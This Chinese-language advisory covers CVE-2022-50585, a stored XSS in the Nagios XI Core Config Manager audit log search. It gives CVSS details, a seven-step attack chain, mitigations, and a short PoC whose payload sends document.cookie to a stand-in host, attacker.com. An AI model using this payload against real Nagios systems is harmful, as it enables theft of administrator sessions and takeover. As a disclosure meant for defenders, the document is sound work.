Nagios XI CCM 审计日志页面搜索功能存在XSS跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2022-50585

漏洞类型

XSS跨站脚本攻击

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI Core Config Manager (CCM)

漏洞概述

Nagios XI是一款流行的网络和系统监控解决方案。其核心配置管理器(CCM)组件在审计日志(Audit Log)页面的搜索输入功能中存在存储型跨站脚本(XSS)漏洞。攻击者可通过在搜索框中注入恶意JavaScript代码，当其他用户访问审计日志页面并执行搜索时，恶意脚本将在受害者浏览器上下文中执行。这允许攻击者窃取会话Cookie、劫持用户会话、修改页面内容或执行其他基于浏览器的攻击。由于该漏洞需要低权限用户身份且需要用户交互才能触发，因此CVSS评分为5.4(中危)。受影响版本为Nagios XI 5.8.9之前的版本以及CCM 3.1.7之前的版本。

技术细节

该漏洞位于Nagios XI的CCM组件审计日志模块中。攻击者首先需要获得Nagios XI系统的低权限账号(如guest或普通监控用户)。登录后，攻击者访问CCM的审计日志页面，在搜索输入框中注入恶意JavaScript代码(如<script>alert(document.cookie)</script>)。由于应用程序未对用户输入进行充分的输入验证和输出编码，恶意脚本被存储在数据库中。当具有更高权限的用户(如管理员)访问同一审计日志页面并执行搜索操作时，存储的恶意脚本会被检索并作为页面内容的一部分在用户浏览器中执行。攻击者可利用此机会窃取管理员的会话令牌，从而获得系统的完全控制权。漏洞的根本原因是CCM模块在处理搜索参数时缺少适当的HTML转义和内容安全策略(CSP)限制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为Nagios XI，并确定其版本号低于5.8.9

STEP 2

步骤2: 获取低权限访问

攻击者获取Nagios XI系统的低权限用户账号(通过默认凭据、弱密码或社会工程学)

STEP 3

步骤3: 访问漏洞点

使用低权限账号登录系统，导航至CCM -> Tools -> Audit Log页面

STEP 4

步骤4: 注入恶意脚本

在审计日志的搜索输入框中注入XSS payload，如<script>窃取cookie脚本</script>

STEP 5

步骤5: 等待管理员触发

当具有更高权限的管理员或用户访问审计日志页面并执行搜索时，恶意脚本被提取并执行

STEP 6

步骤6: 会话劫持

恶意脚本窃取管理员的会话Cookie并发送到攻击者控制的服务器

STEP 7

步骤7: 权限提升

攻击者使用窃取的会话冒充管理员，执行未授权操作或获取系统完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2022-50585 XSS PoC - Nagios XI CCM Audit Log Search -->
<!-- This PoC demonstrates the XSS vulnerability in Nagios XI CCM -->

<!-- Step 1: Inject XSS payload into the Audit Log search input -->
<!-- Payload: <script>alert('XSS')</script> or more sophisticated -->

<!-- Basic XSS PoC payload -->
<script>alert(document.domain)</script>

<!-- Cookie stealing payload (for educational purposes) -->
<script>new Image().src='http://attacker.com/steal?c='+document.cookie</script>

<!-- Simulated attack scenario -->
<!-- 
1. Attacker logs into Nagios XI with low-privilege account
2. Navigate to: CCM -> Tools -> Audit Log
3. In the search box, enter the XSS payload
4. Submit the search (payload gets stored)
5. When admin views the Audit Log, XSS executes
6. Attacker can steal session cookies or perform actions as admin
*/

影响范围

Nagios XI < 5.8.9

CCM (Core Config Manager) < 3.1.7

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：(1)限制CCM模块的访问权限，仅允许受信任的管理员访问审计日志功能；(2)实施Web应用防火墙(WAF)规则过滤可疑的script标签和JavaScript事件处理器；(3)监控审计日志页面的访问和搜索行为，及时发现异常；(4)使用HTTPOnly和Secure标志保护会话Cookie，降低会话劫持风险；(5)考虑临时禁用审计日志搜索功能，直到完成版本升级。